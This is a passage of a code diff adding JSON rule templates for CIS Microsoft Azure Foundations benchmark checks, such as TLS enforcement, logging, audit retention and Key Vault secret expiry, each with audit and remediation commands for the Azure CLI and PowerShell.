here. You will be responsible for the lifecycle of the keys, and will need to manually replace them at your own determined intervals to keep the data secure.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-5-encrypt-sensitive-data-at-rest\n2. https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/activity-log?tabs=cli#managing-legacy-log-profiles", + "id": "01629238-aea8-5737-a59b-45baf8dab404", + "name": "Ensure the storage account containing the container with activity logs is encrypted with Customer Managed Key", + "profile_applicability": "* Level 2", + "description": "Storage accounts with the activity log exports can be configured to use Customer Managed Keys (CMK).", + "rationale": "Configuring the storage account with the activity log export container to use CMKs provides additional confidentiality controls on log data, as a given user must have read permission on the corresponding storage account and must be granted decrypt permission by the CMK.", + "audit": "**From Azure Portal**\n\n1. Go to `Activity log`\n2. Select `Export`\n3. Select `Subscription`\n4. In section `Storage Account`, note the name of the Storage account\n5. Close the `Export Audit Logs` blade. Close the `Monitor - Activity Log` blade.\n6. In right column, Click service `Storage Accounts` to access Storage account blade\n7. Click on the storage account name noted in step 4. This will open blade specific to that storage account\n8. Under `Security + networking`, click `Encryption`.\n9. Ensure `Customer-managed keys` is selected and `Key URI` is set.\n\n**From Azure CLI**\n\n10. Get storage account id configured with log profile:\n\n```\naz monitor diagnostic-settings subscription list --subscription --query 'value[*].storageAccountId'\n```\n\n11. Ensure the storage account is encrypted with CMK:\n\n```\naz storage account list --query \"[?name=='']\"\n```\n\nIn command output ensure `keySource` is set to `Microsoft.Keyvault` and `keyVaultProperties` is not set to `null`\n\n**From PowerShell**\n\n```\nGet-AzStorageAccount -ResourceGroupName -Name |select-object -ExpandProperty encryption|format-list\n```\n\nEnsure the value of `KeyVaultProperties` is not `null` or empty, and ensure `KeySource` is not set to `Microsoft.Storage`.", + "remediation": "**From Azure Portal**\n\n1. Navigate to the Storage accounts blade.\n2. Click on the storage account.\n3. Under `Security + networking`, click `Encryption`.\n4. Next to `Encryption type`, select `Customer-managed keys`.\n5. Complete the steps to configure a customer-managed key for encryption of the storage account.\n\n**From Azure CLI**\n\n```\naz storage account update --name --resource-group --encryption-key-source=Microsoft.Keyvault --encryption-key-vault --encryption-key-name --encryption-key-version \n```\n\n**From PowerShell**\n\n```\nSet-AzStorageAccount -ResourceGroupName -Name -KeyvaultEncryption -KeyVaultUri -KeyName \n```", + "section": "Configuring Diagnostic Settings", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 5.1.4", + "Configuring Diagnostic Settings" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "5.1.4", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_5_1_4" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/02da047f-bc78-5565-86a0-e121850f76c0.json b/packages/cloud_security_posture/kibana/csp_rule_template/02da047f-bc78-5565-86a0-e121850f76c0.json new file mode 100644 index 00000000000..9f2e13b1d5b --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/02da047f-bc78-5565-86a0-e121850f76c0.json @@ -0,0 +1,38 @@ +{ + "id": "02da047f-bc78-5565-86a0-e121850f76c0", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/mysql/concepts-ssl-connection-security\n2. https://docs.microsoft.com/en-us/azure/mysql/howto-configure-ssl\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-4-enable-data-at-rest-encryption-by-default", + "id": "02da047f-bc78-5565-86a0-e121850f76c0", + "name": "Ensure 'TLS Version' is set to 'TLSV1.2' for MySQL flexible Database Server", + "profile_applicability": "* Level 1", + "description": "Ensure `TLS version` on `MySQL flexible` servers is set to the default value.", + "rationale": "TLS connectivity helps to provide a new layer of security by connecting database server to client applications using Transport Layer Security (TLS).\nEnforcing TLS connections between database server and client applications helps protect against \"man in the middle\" attacks by encrypting the data stream between the server and application.", + "audit": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com\n2. Go to `Azure Database for MySQL flexible servers`\n3. For each database, click on `Server parameters` under `Settings`\n4. In the search box, type in `tls_version`\n5. Ensure `tls_version` is set to `TLSV1.2`\n\n**From Azure CLI**\n\nEnsure the output of the below command contains the key value pair `\"values\": \"TLSV1.2\"`.\n ```\n az mysql flexible-server parameter show --name tls_version --resource-group --server-name \n```\n\nExample output:\n```\n{\n \"allowedValues\": \"TLSv1,TLSv1.1,TLSv1.2\",\n \"dataType\": \"Set\",\n \"defaultValue\": \"TLSv1.2\",\n \"description\": \"Which protocols the server permits for encrypted connections.\nBy default, TLS 1.2 is enforced\",\n \"id\": \"/subscriptions//resourceGroups//providers/Microsoft.DBforMySQL/flexibleServers//configurations/tls_version\",\n \"isConfigPendingRestart\": \"False\",\n \"isDynamicConfig\": \"False\",\n \"isReadOnly\": \"False\",\n \"name\": \"tls_version\",\n \"resourceGroup\": \"\",\n \"source\": \"system-default\",\n \"systemData\": null,\n \"type\": \"Microsoft.DBforMySQL/flexibleServers/configurations\",\n \"value\": \"TLSv1.2\"\n}\n```", + "remediation": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com\n2. Go to `Azure Database for MySQL flexible servers`\n3. For each database, click on `Server parameters` under `Settings`\n4. In the search box, type in `tls_version`\n5. Click on the VALUE dropdown, and ensure only `TLSV1.2` is selected for `tls_version`\n\n**From Azure CLI**\n\nUse the below command to set MYSQL flexible databases to used version 1.2 for the `tls_version` parameter.\n```\n az mysql flexible-server parameter set --name tls_version --resource-group --server-name --value TLSV1.2\n```", + "section": "MySQL Database", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.4.2", + "MySQL Database" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.4.2", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_4_2" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/090923c7-e599-572b-bad3-703f768c262a.json b/packages/cloud_security_posture/kibana/csp_rule_template/090923c7-e599-572b-bad3-703f768c262a.json new file mode 100644 index 00000000000..316980c275c --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/090923c7-e599-572b-bad3-703f768c262a.json @@ -0,0 +1,38 @@ +{ + "id": "090923c7-e599-572b-bad3-703f768c262a", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Being a level 2, enabling this setting can have a high impact on the cost of data storage used for logging more data per each request. Do not enable this without determining your need for this level of logging or forget to check in on data usage and projected cost.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/rest/api/storageservices/about-storage-analytics-logging\n2. https://docs.microsoft.com/en-us/cli/azure/storage/logging?view=azure-cli-latest\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-4-enable-logging-for-azure-resources", + "id": "090923c7-e599-572b-bad3-703f768c262a", + "name": "Ensure Storage Logging is Enabled for Table Service for 'Read', 'Write', and 'Delete' Requests", + "profile_applicability": "* Level 2", + "description": "Azure Table storage is a service that stores structured NoSQL data in the cloud, providing a key/attribute store with a schema-less design.\nStorage Logging happens server-side and allows details for both successful and failed requests to be recorded in the storage account.\nThese logs allow users to see the details of read, write, and delete operations against the tables.\nStorage Logging log entries contain the following information about individual requests: timing information such as start time, end-to-end latency, and server latency; authentication details; concurrency information; and the sizes of the request and response messages.", + "rationale": "Storage Analytics logs contain detailed information about successful and failed requests to a storage service.\nThis information can be used to monitor each individual request to a storage service for increased security or diagnostics.\nRequests are logged on a best-effort basis.\n\nStorage Analytics logging is not enabled by default for your storage account.", + "audit": "**From Azure Portal**\n\n1. From the default portal page select `Storage Accounts`.\n2. Select the specific Storage Account.\n3. Click the `Diagnostics settings` under the `Monitoring` section in the left column.\n4. Select the 'table' tab indented below the storage account. Then select the diagnostic setting listed.\n5. Ensure `StorageRead`, `StorageWrite`, and `StorageDelete` options are selected under the `Logging section` and that they are sent to the correct destination.\n\n**From Azure CLI**\n\nEnsure the below command's output contains properties delete, read and write set to true.\n\n```\naz storage logging show --services t --account-name \n```", + "remediation": "**From Azure Portal**\n\n1. From the default portal page select `Storage Accounts`.\n2. Select the specific Storage Account.\n3. Click the `Diagnostics settings` under the `Monitoring` section in the left column.\n4. Select the 'table' tab indented below the storage account. \n5. Click '+ Add diagnostic setting'.\n6. Select `StorageRead`, `StorageWrite` and `StorageDelete` options under the `Logging` section to enable Storage Logging for Table service.\n7. Select a destination for your logs to be sent to.\n\n**From Azure CLI**\n\nUse the below command to enable the Storage Logging for Table service.\n\n```\naz storage logging update --account-name --account-key --services t --log rwd --retention 90\n```", + "section": "Storage Accounts", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 3.14", + "Storage Accounts" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "3.14", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_3_14" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/213e2b33-f2b1-575b-8753-f239b278c25a.json b/packages/cloud_security_posture/kibana/csp_rule_template/213e2b33-f2b1-575b-8753-f239b278c25a.json new file mode 100644 index 00000000000..a551e308efe --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/213e2b33-f2b1-575b-8753-f239b278c25a.json @@ -0,0 +1,38 @@ +{ + "id": "213e2b33-f2b1-575b-8753-f239b278c25a", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/rest/api/postgresql/singleserver/configurations/list-by-server\n2. https://docs.microsoft.com/en-us/azure/postgresql/howto-configure-server-parameters-using-portal\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-4-enable-logging-for-azure-resources\n4. https://learn.microsoft.com/en-us/azure/postgresql/single-server/concepts-server-logs#configure-logging\n5. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/get-azpostgresqlconfiguration?view=azps-9.2.0#example-2-get-specified-postgresql-configuration-by-name\n6. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/update-azpostgresqlconfiguration?view=azps-9.2.0#example-1-update-postgresql-configuration-by-name", + "id": "213e2b33-f2b1-575b-8753-f239b278c25a", + "name": "Ensure Server Parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server", + "profile_applicability": "* Level 1", + "description": "Enable `log_checkpoints` on `PostgreSQL Servers`.", + "rationale": "Enabling `log_checkpoints` helps the PostgreSQL Database to `Log each checkpoint` in turn generates query and error logs.\nHowever, access to transaction logs is not supported.\nQuery and error logs can be used to identify, troubleshoot, and repair configuration errors and sub-optimal performance.", + "audit": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Server parameters`.\n4. Search for `log_checkpoints`.\n5. Ensure that value is set to `ON`.\n\n**From Azure CLI**\n\nEnsure value is set to `ON`\n```\naz postgres server configuration show --resource-group --server-name --name log_checkpoints\n```\n\n**From PowerShell**\n\nEnsure value is set to `ON`\n\n```\nGet-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name log_checkpoints\n```", + "remediation": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Server parameters`.\n4. Search for `log_checkpoints`.\n5. Click `ON` and save.\n\n**From Azure CLI**\n\nUse the below command to update `log_checkpoints` configuration.\n```\naz postgres server configuration set --resource-group --server-name --name log_checkpoints --value on\n```\n\n**From PowerShell**\n\n```\nUpdate-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name log_checkpoints -Value on\n```", + "section": "PostgreSQL Database Server", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.3.2", + "PostgreSQL Database Server" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.3.2", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_3_2" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/27896f4b-0405-5388-bacd-182e77556711.json b/packages/cloud_security_posture/kibana/csp_rule_template/27896f4b-0405-5388-bacd-182e77556711.json new file mode 100644 index 00000000000..366be869d51 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/27896f4b-0405-5388-bacd-182e77556711.json @@ -0,0 +1,38 @@ +{ + "id": "27896f4b-0405-5388-bacd-182e77556711", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/sql-database/sql-database-auditing\n2. https://docs.microsoft.com/en-us/powershell/module/azurerm.sql/get-azurermsqlserverauditing?view=azurermps-5.2.0\n3. https://docs.microsoft.com/en-us/powershell/module/azurerm.sql/set-azurermsqlserverauditing?view=azurermps-5.2.0\n4. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-6-configure-log-storage-retention", + "id": "27896f4b-0405-5388-bacd-182e77556711", + "name": "Ensure that 'Auditing' Retention is 'greater than 90 days'", + "profile_applicability": "* Level 1", + "description": "SQL Server Audit Retention should be configured to be greater than 90 days.", + "rationale": "Audit Logs can be used to check for anomalies and give insight into suspected breaches or misuse of information and access.", + "audit": "**From Azure Portal**\n\n1. Go to `SQL servers`\n2. For each server instance\n3. Click on `Auditing`\n4. If storage is selected, expand `Advanced properties`\n5. Ensure `Retention (days)` setting is greater than `90` days or `0` for unlimited retention.\n\n**From PowerShell**\n\nGet the list of all SQL Servers \n```\nGet-AzSqlServer\n```\nFor each Server\n```\nGet-AzSqlServerAudit -ResourceGroupName -ServerName \n```\nEnsure that `RetentionInDays` is set to `more than 90`\n\n**Note:** If the SQL server is set with `LogAnalyticsTargetState` setting set to `Enabled`, run the following additional command.\n\n```\nGet-AzOperationalInsightsWorkspace | Where-Object {$_.ResourceId -eq }\n```\n\nEnsure that `RetentionInDays` is set to `more than 90`", + "remediation": "**From Azure Portal**\n\n1. Go to `SQL servers`\n2. For each server instance\n3. Click on `Auditing`\n4. If storage is selected, expand `Advanced properties`\n5. Set the `Retention (days)` setting greater than `90` days or `0` for unlimited retention.\n6. Select `Save`\n\n**From PowerShell**\nFor each Server, set retention policy to more than 90 days\n\n**Log Analytics Example**\n```\nSet-AzSqlServerAudit -ResourceGroupName -ServerName -RetentionInDays -LogAnalyticsTargetState Enabled -WorkspaceResourceId \"/subscriptions//resourceGroups/insights-integration/providers/Microsoft.OperationalInsights/workspaces/\n```\n\n**Event Hub Example**\n\n```\nSet-AzSqlServerAudit -ResourceGroupName \"\" -ServerName \"\" -EventHubTargetState Enabled -EventHubName \n \"\" -EventHubAuthorizationRuleResourceId \"\"\n```\n\n**Blob Storage Example***\n\n```\nSet-AzSqlServerAudit -ResourceGroupName \"\" -ServerName \"\" -BlobStorageTargetState Enabled \n -StorageAccountResourceId \"/subscriptions//resourceGroups//providers/Microsoft.Stora\n ge/storageAccounts/\"\n```", + "section": "SQL Server - Auditing", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.1.6", + "SQL Server - Auditing" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.1.6", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_1_6" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/43d5538c-17a3-5e04-9c06-ad4323bfd188.json b/packages/cloud_security_posture/kibana/csp_rule_template/43d5538c-17a3-5e04-9c06-ad4323bfd188.json new file mode 100644 index 00000000000..d92273203a7 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/43d5538c-17a3-5e04-9c06-ad4323bfd188.json @@ -0,0 +1,38 @@ +{ + "id": "43d5538c-17a3-5e04-9c06-ad4323bfd188", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Any deployment workflows that rely on FTP or FTPs rather than the WebDeploy or HTTPs endpoints may be affected.", + "default_value": "", + "references": "1. [Azure Web Service Deploy via FTP](https://docs.microsoft.com/en-us/azure/app-service/deploy-ftp):[Azure Web Service Deployment](https://docs.microsoft.com/en-us/azure/app-service/overview-security)\n2. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-4-encrypt-sensitive-information-in-transit\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-posture-vulnerability-management#pv-7-rapidly-and-automatically-remediate-software-vulnerabilities", + "id": "43d5538c-17a3-5e04-9c06-ad4323bfd188", + "name": "Ensure FTP deployments are Disabled", + "profile_applicability": "* Level 1", + "description": "By default, Azure Functions, Web, and API Services \ncan be deployed over FTP.\nIf FTP is required for an\nessential deployment workflow, FTPS should be required\nfor FTP login for all App Service Apps and Functions.", + "rationale": "Azure FTP deployment endpoints are public.\nAn attacker listening to traffic on a wifi network used by a remote employee or a corporate network could see login traffic in clear-text which would then grant them full control of the code base of the app or service.\nThis finding is more severe if User Credentials for deployment are set at the subscription level rather than using the default Application Credentials which are unique per App.", + "audit": "**From Azure Portal**\n\n1. Go to the Azure Portal\n2. Select `App Services`\n3. Click on an app\n4. Select `Settings` and then `Configuration`\n5. Under `General Settings`, for the `Platform Settings`, the `FTP state` should not be set to `All allowed`\n\n**From Azure CLI** \n\nList webapps to obtain the ids.\n\n```\naz webapp list\n```\n\nList the publish profiles to obtain the username, password\nand ftp server url.\n\n```\naz webapp deployment list-publishing-profiles --ids \n{\n \"publishUrl\": ,\n \"userName\": ,\n \"userPWD\": ,\n}\n```\n\n**From PowerShell**\n\nList all Web Apps:\n\n```\nGet-AzWebApp\n```\n\nFor each app:\n\n```\nGet-AzWebApp -ResourceGroupName -Name | Select-Object -ExpandProperty SiteConfig\n```\n\nIn the output, look for the value of **FtpsState**.\nIf its value is **AllAllowed** the setting is out of compliance.\nAny other value is considered in compliance with this check.", + "remediation": "**From Azure Portal**\n\n1. Go to the Azure Portal\n2. Select `App Services`\n3. Click on an app\n4. Select `Settings` and then `Configuration`\n5. Under `General Settings`, for the `Platform Settings`, the `FTP state` should be set to `Disabled` or `FTPS Only`\n\n**From Azure CLI**\n\nFor each out of compliance application, run the following choosing either 'disabled' or 'FtpsOnly' as appropriate:\n\n```\naz webapp config set --resource-group --name --ftps-state [disabled|FtpsOnly]\n```\n\n**From PowerShell**\n\nFor each out of compliance application, run the following:\n\n```\nSet-AzWebApp -ResourceGroupName -Name -FtpsState \n```", + "section": "AppService", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 9.10", + "AppService" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "9.10", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_9_10" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/461c5ca2-0173-5b8c-ae36-b229cffefbb2.json b/packages/cloud_security_posture/kibana/csp_rule_template/461c5ca2-0173-5b8c-ae36-b229cffefbb2.json new file mode 100644 index 00000000000..292d53f70ba --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/461c5ca2-0173-5b8c-ae36-b229cffefbb2.json @@ -0,0 +1,38 @@ +{ + "id": "461c5ca2-0173-5b8c-ae36-b229cffefbb2", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Configuring this setting will result in logs being retained for the specified number of days. If this is configured on a high traffic server, the log may grow quickly to occupy a large amount of disk space. In this case you may want to set this to a lower number.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/postgresql/howto-configure-server-parameters-using-portal\n2. https://docs.microsoft.com/en-us/rest/api/postgresql/singleserver/configurations/list-by-server\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-6-configure-log-storage-retention\n4. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/get-azpostgresqlconfiguration?view=azps-9.2.0#example-2-get-specified-postgresql-configuration-by-name\n5. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/update-azpostgresqlconfiguration?view=azps-9.2.0#example-1-update-postgresql-configuration-by-name", + "id": "461c5ca2-0173-5b8c-ae36-b229cffefbb2", + "name": "Ensure Server Parameter 'log_retention_days' is greater than 3 days for PostgreSQL Database Server", + "profile_applicability": "* Level 1", + "description": "Ensure `log_retention_days` on `PostgreSQL Servers` is set to an appropriate value.", + "rationale": "Configuring `log_retention_days` determines the duration in days that `Azure Database for PostgreSQL` retains log files.\nQuery and error logs can be used to identify, troubleshoot, and repair configuration errors and sub-optimal performance.", + "audit": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Server parameters`.\n4. Search for `log_retention_days`.\n5. Ensure that the `value` is between 4 and 7 (inclusive).\n\n**From Azure CLI**\n\nEnsure `log_retention_days` value is greater than 3.\n\n```\naz postgres server configuration show --resource-group --server-name --name log_retention_days\n```\n\n**From Powershell**\n\nEnsure `log_retention_days` value is greater than 3.\n```\nGet-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name log_retention_days\n```", + "remediation": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Server parameters`.\n4. Search for `log_retention_days`.\n5. Input a value between 4 and 7 (inclusive) and click `Save`.\n\n**From Azure CLI**\n\nUse the below command to update `log_retention_days` configuration.\n```\naz postgres server configuration set --resource-group --server-name --name log_retention_days --value <4-7>\n```\n\n**From Powershell**\n\nUse the below command to update `log_retention_days` configuration.\n```\nUpdate-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name log_retention_days -Value <4-7>\n```", + "section": "PostgreSQL Database Server", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.3.6", + "PostgreSQL Database Server" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.3.6", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_3_6" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/5ecb8a19-541a-5578-9b9d-b22c1bfbc5e9.json b/packages/cloud_security_posture/kibana/csp_rule_template/5ecb8a19-541a-5578-9b9d-b22c1bfbc5e9.json new file mode 100644 index 00000000000..c69c1d8124f --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/5ecb8a19-541a-5578-9b9d-b22c1bfbc5e9.json @@ -0,0 +1,38 @@ +{ + "id": "5ecb8a19-541a-5578-9b9d-b22c1bfbc5e9", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Secrets cannot be used beyond their assigned expiry date respectively. Secrets need to be rotated periodically wherever they are used.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/key-vault/key-vault-whatis\n2. https://docs.microsoft.com/en-us/rest/api/keyvault/about-keys--secrets-and-certificates#key-vault-secrets\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-6-use-a-secure-key-management-process\n4. https://docs.microsoft.com/en-us/powershell/module/az.keyvault/set-azkeyvaultsecretattribute?view=azps-0.10.0", + "id": "5ecb8a19-541a-5578-9b9d-b22c1bfbc5e9", + "name": "Ensure that the Expiration Date is set for all Secrets in RBAC Key Vaults", + "profile_applicability": "* Level 1", + "description": "Ensure that all Secrets in Role Based Access Control (RBAC) Azure Key Vaults have an expiration date set.", + "rationale": "The Azure Key Vault enables users to store and keep secrets within the Microsoft Azure environment.\nSecrets in the Azure Key Vault are octet sequences with a maximum size of 25k bytes each.\nThe `exp` (expiration date) attribute identifies the expiration date on or after which the secret MUST NOT be used.\nBy default, secrets never expire.\nIt is thus recommended to rotate secrets in the key vault and set an explicit expiration date for all secrets.\nThis ensures that the secrets cannot be used beyond their assigned lifetimes.", + "audit": "**From Azure Portal:**\n\n1. Go to `Key vaults`.\n2. For each Key vault, click on `Secrets`.\n3. In the main pane, ensure that the status of the secret is `Enabled`.\n4. For each enabled secret, ensure that an appropriate `Expiration date` is set.\n\n**From Azure CLI:**\n\nEnsure that the output of the below command contains ID (id), enabled status as `true` and Expiration date (expires) is not empty or null:\n\n```\naz keyvault secret list --vault-name --query '[*].{\"kid\":kid,\"enabled\":attributes.enabled,\"expires\":attributes.expires}'\n```\n\n**From PowerShell:**\n\nRetrieve a list of Key vaults:\n\n```\nGet-AzKeyVault\n```\n\nFor each Key vault, run the following command to determine which vaults are configured to use RBAC:\n\n```\nGet-AzKeyVault -VaultName \n```\n\nFor each Key vault with the `EnableRbacAuthorizatoin` setting set to `True`, run the following command:\n\n```\nGet-AzKeyVaultSecret -VaultName \n```\n\nMake sure the `Expires` setting is configured with a value as appropriate wherever the `Enabled` setting is set to `True`.", + "remediation": "**From Azure Portal:**\n\n1. Go to `Key vaults`.\n2. For each Key vault, click on `Secrets`.\n3. In the main pane, ensure that the status of the secret is `Enabled`.\n4. For each enabled secret, ensure that an appropriate `Expiration date` is set.\n\n**From Azure CLI:**\n\nUpdate the Expiration date for the secret using the below command:\n\n```\naz keyvault secret set-attributes --name --vault-name --expires Y-m-d'T'H:M:S'Z'\n```\n\nNote:\nTo view the expiration date on all secrets in a Key Vault using Microsoft API, the `List` Key permission is required.\n\nTo update the expiration date for the secrets:\n5. Go to the Key vault, click on `Access Control (IAM)`.\n6. Click on `Add role assignment` and assign the role of `Key Vault Secrets Officer` to the appropriate user.\n\n**From PowerShell:**\n\n```\nSet-AzKeyVaultSecretAttribute -VaultName -Name -Expires \n```", + "section": "Key Vault", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 8.3", + "Key Vault" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "8.3", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_8_3" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/66cdd4cc-5870-50e1-959c-91443716b87a.json b/packages/cloud_security_posture/kibana/csp_rule_template/66cdd4cc-5870-50e1-959c-91443716b87a.json new file mode 100644 index 00000000000..254b960ee09 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/66cdd4cc-5870-50e1-959c-91443716b87a.json @@ -0,0 +1,38 @@ +{ + "id": "66cdd4cc-5870-50e1-959c-91443716b87a", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/key-vault/general/howto-logging\n2. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-8-ensure-security-of-key-and-certificate-repository\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-3-enable-logging-for-security-investigation", + "id": "66cdd4cc-5870-50e1-959c-91443716b87a", + "name": "Ensure that logging for Azure Key Vault is 'Enabled'", + "profile_applicability": "* Level 1", + "description": "Enable AuditEvent logging for key vault instances to ensure interactions with key vaults are logged and available.", + "rationale": "Monitoring how and when key vaults are accessed, and by whom, enables an audit trail of interactions with confidential information, keys, and certificates managed by Azure Keyvault.\nEnabling logging for Key Vault saves information in an Azure storage account which the user provides.\nThis creates a new container named insights-logs-auditevent automatically for the specified storage account.\nThis same storage account can be used for collecting logs for multiple key vaults.", + "audit": "**From Azure Portal**\n\n1. Go to `Key vaults`\n2. For each Key vault\n3. Go to `Diagnostic settings`\n4. Click on `Edit Settings`\n5. Ensure that `Archive to a storage account` is `Enabled`\n6. Ensure that `AuditEvent` is checked, and the retention days is set to `180 days` or as appropriate\n\n**From Azure CLI**\n\nList all key vaults\n\n```\naz keyvault list\n```\n\nFor each keyvault `id`\n```\naz monitor diagnostic-settings list --resource \n```\n\nEnsure that `storageAccountId` is set as appropriate.\nAlso, ensure that `category` and `days` are set.\nOne of the sample outputs is as below.\n\n```\n\"logs\": [\n {\n \"category\": \"AuditEvent\",\n \"enabled\": true,\n \"retentionPolicy\": {\n \"days\": 180,\n \"enabled\": true\n }\n}\n ]\n```\n\n**From PowerShell** \n\nList the key vault(s) in the subscription\n\n```\nGet-AzKeyVault\n```\n\nFor each key vault, run the following: \n\n```\nGet-AzDiagnosticSetting -ResourceId \n```\n\nEnsure that `StorageAccountId`, `ServiceBusRuleId`, `MarketplacePartnerId`, or `WorkspaceId` is set as appropriate.\nAlso, ensure that `enabled` is set to `true`, and that `category` and `days` are set under the `Log` heading.", + "remediation": "**From Azure Portal**\n\n1. Go to `Key vaults`\n2. Select a Key vault\n3. Select `Diagnostic settings`\n4. Click on `Edit setting` against an 